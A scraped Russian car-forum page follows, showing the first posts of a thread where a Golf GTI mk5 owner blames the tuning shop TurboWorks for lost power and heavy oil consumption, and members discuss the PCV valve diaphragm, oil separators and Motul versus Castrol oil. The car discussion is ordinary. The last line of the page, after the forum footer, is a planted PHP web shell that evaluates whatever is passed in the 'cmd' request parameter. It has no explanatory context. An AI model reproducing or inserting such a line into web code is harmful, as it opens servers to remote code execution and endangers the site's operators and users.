+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 54

Тема: Пропала мощность и начался жор масла после посещения TurboWorks


  1. #1
    GTI-Racing Gtilover is on a distinguished road Аватар для Gtilover
    Регистрация
    09.02.2013
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12

    Пропала мощность и начался жор масла после посещения TurboWorks

    После посещения TurboWorks начались проблемы:
    - пропала мощность. тупит - как будто постоянно залит плохой бензин.
    - начался жор масла - от нормы до красной зоны за 1300 км. Раньше от замены до замены доливали не более литра.

    Golf GTI mk5, пробег 60 тысяч, не гоняем.

    Хочется все исправить. Какие будут предложения? Почему начался жор масла?

    что делали в TurboWorks
    - поменяли масло. Было Кастрол, стало Motul
    - диагностировали другую проблему, в итоге поставили диагноз - замена форсунки. Форсунку поменяли, не помогло. Еще подиагностировали - нашли проблему порвалась какая-то маслянная сеточка. Из-за нее в патрубке полно масло было, засрались свечи за 200 км.

    Может не все почистили когда меняли форсунки? Я лично не присутствовал, хотелось бы комментариев от TurboWorks, что делали и почему начались проблемы...

  2. #2
    GTI-Racing maxymax is on a distinguished road Аватар для maxymax
    Регистрация
    14.05.2010
    Откуда
    Пятигорск
    Машина
    Golf 6 GTI
    Сообщений
    207
    Очень похоже на то, что есть дырка в диафрагме псв клапана, если правильно помню его название. Байда, которая на клапанной крышке стоит, картерными газами управляет.

  3. #3
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Мне тоже не везло с Мотюлем. Доливал я оч часто и по многу. Думал амба мотору, залил другое и отъездил ни подлив ни разу. Опять залил мотюль и так же еще канистра ушла за смену дополнительная. Опчть другое масло и ни разу не долил....а есть тут много владельцев у кого такого нет и мотюль работает без угара.
    Но может у тебя и не связано с маслом, но я помню себя (
    песок сыпется....не останавливайтесь на достигнутом !

  4. #4
    GTI-Racing olegarh is on a distinguished road Аватар для olegarh
    Регистрация
    02.08.2007
    Откуда
    Дубки
    Машина
    Калина лакшэри
    Сообщений
    419
    Мотюль-отличное масло,по крайней мере не горит как кастрол и реально работает по температуре.В эво стоял датчик темп масла,так вот в тошнящем режиме всегда 70-90,в Тушино после нескольких кругов жары 100-110 край.Доливал за 5000 км грамм 300,если жечь.В гольфе строго литр на 5000.
    Я думаю ТС надо просто вернуться в TW и попросить решить проблем по-хорошему.

  5. #5
    GTI-Racing Gtilover is on a distinguished road Аватар для Gtilover
    Регистрация
    09.02.2013
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    "дырка в диафрагме псв клапана"

    как раз это и меняли. Была дырка в диафрагме и двигатель плохо работал на холостых, троил, плавали обороты. Проблему выявили не сразу и сделали много лишних работ.

    "вот ответ ТурбоВоркс:
    1)как поняли что пропала мощность?замеры со стенда?загорелся чек?машина дергается?
    2)если вы помните вашу машину перевели на Motul,а так как новое масло оказалось не такое гуталиновое как используемое вами ранее мотор начал его есть,опять же по причине общего состояния агрегата."

  6. #6
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Ну только из за замены оригинального масла мотор не забарахлит, но все же мысль по поводу старого масла в виде густой консистенции под гуталин интересна. Если система маслянная была на таком масле, то конесно не ращ бывает, что мотор с пробегом потом начинает что то где то подъедать или наоборот промоется хорошим маслом и пестец гуталиновые пробки забивают каналы.
    Я даано еще ТАЗ08 с пробегом 50т км привез в сервис, так когда сняли клапанную крышку, это был пестец какой гудрон под ней...не повезло видно с маслом(
    Я бы для начала скинул крышку и посмотрел бы как оно там сейчас, махнул бы маслица еще пару раз если там дейст гуталиноподобное масло. И все это конечно за свой счет.

    А как ты сам видишь, что должны сейчас исправить они?


    Никогда не наезжал на сервисы, дело случая и неожиданности : приехал в сервис и что то открылось или дриснуло. Это железо и надо понимать и решать все объективно.
    Я всегда поддерживаю одноклубнеков и если все конструктивно, то надеюсь и на конструктивный ответ ТВ.
    песок сыпется....не останавливайтесь на достигнутом !

  7. #7
    GTI-Racing Gtilover is on a distinguished road Аватар для Gtilover
    Регистрация
    09.02.2013
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    Я считаю, что ТВ должны нести ответственность за следующий диалог случившийся когда я приехал к ним на замену масла:

    ТВ, Ваня: У нас Кастрола нет, только Мотюль.
    Я: Проблем не будет, оно входит в список рекомендуемых? Менять тип масла безопасно?
    ТВ, Ваня: Проблем быть не должно, оно лучше.

    Как оказалось, залить чистящий Мотюль была плохой идеей. Люди с опытом, специалисты в своем деле должны были это предусмотреть. Я хочу устранить проблемы возникшие из-за такого решения. Предлагаю ТВ поучавствовать в этом, как первоисточник начавщихся проблем. Для начала - составить перечень необходимых работ для устранения проблем.

    Кстати, гуталиновое масло - я не согласен, т.к. на машине не гоняли, регулярно, раньше срока масло меняли. Не очень понятна эта фраза - что-то увидели когда вскрыли двигатель или предположения?

  8. #8
    GTI-Racing olegarh is on a distinguished road Аватар для olegarh
    Регистрация
    02.08.2007
    Откуда
    Дубки
    Машина
    Калина лакшэри
    Сообщений
    419
    Неровная работа движка явно не из-за масла,масло мотор на мк 5 жрет сам по себе,у всех вагов с 2турбо так.Если раньше не ел масло,сейчас стал есть,вернуться на каструлю,только по мне оно в разы хуже мотюля...

  9. #9
    если речь идет о 2,0 турбо , то нужно начинать с осмотра маслоотделителя на блоке и на клапанной крышки . На нижнем маслоотделителе , ломаются перегородки , дальше рветься мембрана на верхнем . Троение , не ровная работа мотора ..............

  10. #10
    GTI-Racing Gtilover is on a distinguished road Аватар для Gtilover
    Регистрация
    09.02.2013
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    Неровнаяя работа двигателя была по другой причине - ее устранили - была дыра в диафрагме псв клапана. Но это поняли на 12-час диагностики, когда поменяли одну форсу и это не помогло. Как оказалось, забыли псв клапан проверить до замены форсы и вскрытия двигателя.


    Сейчас:
    1. Мощность пропала. Согласен с мнениями, что чистящий мотуль передает привет.
    2. Масложер нетепично большой начался. Думаю что-то не почистили и не убрали все последствия порваной диафрагмы псв клапана. Хотя сказали, что все последствия убраны и все почищено.

    Добавлено через 1 минуту
    Цитата Сообщение от Alexandr 922 Посмотреть сообщение
    если речь идет о 2,0 турбо , то нужно начинать с осмотра маслоотделителя на блоке и на клапанной крышки . На нижнем маслоотделителе , ломаются перегородки , дальше рветься мембрана на верхнем . Троение , не ровная работа мотора ..............
    нижний маслоотделитель по-моему так и не посмотрели. Хотя я пару раз говорил, что надо бы...
    Последний раз редактировалось Gtilover; 07.04.2013 в 13:42. Причина: Добавлено сообщение

+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Технический центр TurboWorks
    от Adrenalin в разделе Партнеры / Клубные скидки
    Ответов: 158
    Последнее сообщение: 02.04.2024, 10:22
  2. выхлоп turboworks
    от popoopop123 в разделе Golf 5
    Ответов: 15
    Последнее сообщение: 03.01.2024, 02:14
  3. Тюнинг начался......
    от Доктор Н в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 20
    Последнее сообщение: 02.10.2023, 08:50
  4. Начался ЖОР масла 2.0 TFSI
    от KOT в разделе Двигатель
    Ответов: 63
    Последнее сообщение: 25.02.2014, 10:27
  5. Сервисы, отзывы после посещения
    от GTI-S в разделе Санкт-Петербург
    Ответов: 16
    Последнее сообщение: 20.05.2010, 15:31

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}